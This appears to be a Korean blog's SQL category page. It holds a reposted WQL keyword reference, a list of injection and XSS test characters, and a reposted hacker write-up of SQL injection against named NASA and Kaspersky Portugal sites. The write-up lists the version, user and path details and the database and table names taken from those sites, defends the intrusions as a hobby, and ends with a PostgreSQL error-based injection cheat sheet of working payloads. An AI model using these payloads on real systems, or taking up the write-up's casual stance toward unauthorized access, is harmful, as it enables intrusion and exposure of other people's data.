'SQL'에 해당되는 글 6건

  1. 2013.08.22 WQL (SQL for WMI)
  2. 2010.08.12 입력값 유효성 검사 문자들 (1)
  3. 2009.12.11 SQL Error Base SQL Injection
2013.08.22 10:59


The WMI Query Language (WQL) is a subset of the American National Standards Institute Structured Query Language (ANSI SQL)—with minor semantic changes. The following table lists the WQL keywords.

WQL keywordMeaning
ANDCombines two Boolean expressions, and returns TRUE when both expressions are TRUE.
ASSOCIATORS OFRetrieves all instances that are associated with a source instance.

Use this statement with schema queries and data queries.

__CLASSReferences the class of the object in a query.
FROMSpecifies the class that contains the properties listed in a SELECT statement. Windows Management Instrumentation (WMI) supports data queries from only one class at a time.
GROUP ClauseCauses WMI to generate one notification to represent a group of events.

Use this clause with event queries.

HAVINGFilters the events that are received during the grouping interval that is specified in the WITHIN clause.
ISComparison operator used with NOT and NULL. The syntax for this statement is the following:


(where NOT is optional)

ISAOperator that applies a query to the subclasses of a specified class. For more information, see ISA Operator for Event QueriesISA Operator for Data Queries, and ISA Operator for Schema Queries.
KEYSONLYUsed in REFERENCES OF and ASSOCIATORS OF queries to ensure that the resulting instances are only populated with the keys of the instances, which reduces the overhead of the call.
LIKEOperator that determines whether or not a given character string matches a specified pattern.
NOTComparison operator that use in a WQL SELECT query, for example:

SELECT * FROM meta_class WHERE NOT __class < "Win32" AND NOT __this ISA " Win32_Account"

NULLIndicates an object does not have an explicitly assigned value. NULL is not equivalent to zero (0) or blank.
ORCombines two conditions.

When more than one logical operator is used in a statement, the OR operators are evaluated after the AND operators.

REFERENCES OFRetrieves all association instances that refer to a specific source instance. Use this statement with schema and data queries. The REFERENCES OF statement is similar to the ASSOCIATORS OF statement. However, it does not retrieve endpoint instances; it retrieves the association instances.
SELECTSpecifies the properties that are used in a query.

For more information, see SELECT Statement for Data QueriesSELECT Statement for Event Queries, or SELECT Statement for Schema Queries.

TRUEBoolean operator that evaluates to -1 (minus one).
WHERENarrows the scope of a data, event, or schema query.
WITHINSpecifies a polling or grouping interval.

Use this clause with event queries.

FALSEBoolean operator that evaluates to 0 (zero).


Note  Using a WQL key word as an object name can result in a query that cannot be parsed—even when the query compiles without error.

Related topics

WQL Operators
WQL-Supported Date Formats
WQL-Supported Time Formats

출처 : http://msdn.microsoft.com/

Trackback 0 Comment 0
2010.08.12 14:43

입력값 유효성 검사 문자들

개발 진행시 부주의로 인해 불필요한 문자를 허용하고 있다. 문자와 응용 프로그램에 전달되는 의미를 다룬다.

문자 세부사항
NULL or null 종종 웹 응용 프로그램으로 흥미있는 오류 메시지를 볼 수 있다. PL/SQL 경우 확인할 수 있다.
( ', ";, <!) SQL, XPath 그리고 XML Injection 테스트에 사용되는 SQL 문자열 또는 쿼리에 사용된다.
(-, =, +, ") 고급 SQL Injection 쿼리에 사용된다.
( ', &,! , |, <,>) 명령 실행 취약성을 발견하는 데 사용된다.
"><script>alert(1)</script> 기본적인 Cross-Site Scripting 점검에 사용된다.
{%0d , %0a} Carriage Return Line Feed (새줄); 모든 특수 기능.
{%7f , %ff} 바이트 길이 오버플로우, 최대 7-8 비트 값.
{-1, other} 정수 및 언더플로우 취약점.
Ax1024 + 오버플로우 취약점.
{%n , %x , %s} 포맷 스트링 취약점.
.. / 디렉토리 탐색 취약점.
(%, _, *) 와일드카드 문자는 가끔 DoS 문제 또는 정보의 공개를 표시할 수 있다.

이러한 문자는 다양한 방법(즉, 유니코드)으로 표현할 수 있다. 이러한 문자 집합에 입력을 제한할 때 이해하는 것이 중요합니다.

Trackback 0 Comment 1
  1. 2010.08.12 14:44 address edit & del reply


2009.12.11 13:38

SQL Error Base SQL Injection

1. NASA Full-Disclosure! AGAIN

Ok. First of all, I want to say I made this SQLi public(even though I didn’t wanted to do this), because I saw that somebody else found the vulnerable parameter.
I found this SQLi 3 months ago…
#Why I test websites ?
Because this is my hobby and I want to prove that even big websites which should be very secure, can be hacked, and this is true and sad at the same time.
I think it’s alright what i’m doing because if somebody else would find the vulnerability before me, he/she could do many bad things and damages (shelling, rooting, backdooring,etc).

The WebSite Vulnerable: http://saif-1.larc.nasa.gov/ (CEOS Systems Analysis Database)

(True) and 1=1–

(False) and 1=2–


#Version: 5.1.31-community
#User: root@localhost
#Principal Database: ceossadb
#Path of MySQL: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\

Another thing, the magic_quotes_gpc=OFF, and “user” from mysql have all privileges:


Other Databases:

Tables from ceosvis database:

Tables from principal Database:

I make this public, because i see the website down , and i think the admins fix the vulnerability now because someone has reported the problem (sorry because i didn’t make this first, if was that)

2. Kaspersky Owned

In one evening, when i searched a antivirus, I entered on the official kaspersky website of Portugal from mistake.
Link: www.kaspersky.com.pt
Kaspersky, from what i know has been hacked by “unu” with MySQLi.
So I said to try to see if I could find a vulnerability!
After 5 minutes of searching, I found something interesting, namely::

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: syntax error at or near "\" at character 306 in /home1/_sites/wwwkasperskycompt/kaspersky/PHP/IfDBRevendedoresKaspersky.phpclass on line 121
ERRO na execucao da query getRevendedors
ERROR: syntax error at or near "\" at character 306

pg_exec() : That means as he use a PostgreSQL database.
First time, i checked to see if is injectable, and if i can extract something.
The answer:

True: and 1=1–

False: and 1=2–

So I can make PostGreSQL Injection!

What I extracted?
I wasn’t concerned about the content, I only “got” the names of databases, tables and columns.

#Principal Database: dbdoc
#User: www-data
#Version: PostgreSQL 8.1.11 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)

#Other Databases

1 postgres
2 template1
3 template0
4 monitoring
5 estkaspersky
6 horde
7 licence
8 hardwareipbrick
9 acessosclientes
10 licencefmota
11 temp
12 dbdoc
13 webcalendar
14 ipbox
15 adcav
16 jpleitao2
17 funambol
18 gaia
19 cinel2
20 makeupdate
21 tempdefaultconfig

#The tables from dbdoc database (number:458)

1 table_base_idxml73
2 table_ass_idxml73_idtab1025
3 liga_tipoent_categoria
4 liga_subcat_categoria
5 classif_entidades
6 ignora
7 categoria_entidade
8 site
9 subcategoria_entidade
10 tabela_gestao_ipcontactos
11 ipcontactos_lang_files
12 utilizador_externo
13 webcal_sincro
14 pga_queries
15 pga_forms
16 pga_scripts
17 pga_reports
18 pga_schema
19 pga_layout
20 avaliar
21 estadorec1
22 liga_resultado_tarefa
23 webcal_user
24 utilizadores_operacao
25 webcal_entry
26 webcal_entry_repeats
27 webcal_entry_repeats_not
28 webcal_entry_user
29 webcal_entry_ext_user
30 webcal_user_pref
31 webcal_user_layers
32 exhumationprice
33 webcal_site_extras
34 webcal_reminder_log
35 webcal_group
36 table_base_idxml13
37 webcal_group_user
38 webcal_view
39 webcal_view_user
40 gravetype
41 webcal_entry_log
42 webcal_categories
43 webcal_config
44 cemeterysection
45 solucao
46 ipdoclanguages
47 ipdoctranslation
48 ipdocsentences
49 ipdocpages
50 ipdocpagetranslation
51 table_base_idxml15
52 table_ass_idxml15_idtab51
53 lockcodigos
54 assunto
55 table_base_idxml16
56 subassunto
57 table_ass_idxml16_idtab68
58 entidades2
59 coordenadas_estado
60 dados_infantarios
61 coordenadas_estadopr
62 codigo_accaopr
63 table_base_idxml17
64 raca
65 table_base_idxml18
66 table_base_idxml19
67 table_base_idxml20
68 table_base_idxml14
69 distrito
70 concelho
439 accaopr
440 table_base_idxml79
441 estadopr
442 funcaoproc
443 funcaopr
444 table_ass_idxml79_idtab1183
445 table_ass_idxml79_idtab1190
446 table_ass_idxml79_idtab1191
447 table_ass_idxml79_idtab1192
448 table_ass_idxml79_idtab1193
449 table_ass_idxml77_idtab1194
450 table_base_idxml78
451 table_ass_idxml80_idtab1216
452 table_base_idxml81
453 table_ass_idxml81_idtab1228
454 table_base_idxml70
455 table_base_idxml82
456 documento
457 revisaodoc
458 table_ass_idxml82_idtab1257

#Me: Ma gandesc, daca tot este una din cele mai mari compani din lume care asigura protectia poate a multor milioane de utilizatori prin produsele sale,
de ce nu au grija de propria securitatea in primul rand? Acest lucru poate fi si din cauza firmelor care creaza aceste website-uri intr-un timp foarte scurt pe sume exagerat de mari…
Cam atat.

~Where is a will, there is a way

3. PostgreSQL Error Base Sql Injection Cheat Sheet with Example

HOWTO Ninja's PostgreSQL Error Base Sql Injection Cheat Sheet with Example

well i was playing around with postgresql lately and found some new technique to be share..

which is you may use CAST function to return result in postgresql error base sql injection
for example:

http://target.com/script.php?id=1 and 1=CAST(version() as int)
will return

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 7. 4.19" in /home/target.com/public_html/include/server/srCommon.php on line 27
and if the error return like

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: cannot cast type name to integer
u may need to concatenate your statement with some integer number
for example:

http://target.com/script.php?id=1 and 1=CAST(current_user||CHR(58)||current_database()||CHR(58)||version()||CHR(58)||123 as int)
will return for example:

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: invalid input syntax for integer: "target_user:target_db:PostgreSQL 7.4.19:123"
in /home/target.com/public_html/include/server/srCommon.php on line 27
cool aite? ;-)

출처 : http://tinkode.baywords.com

Trackback 0 Comment 0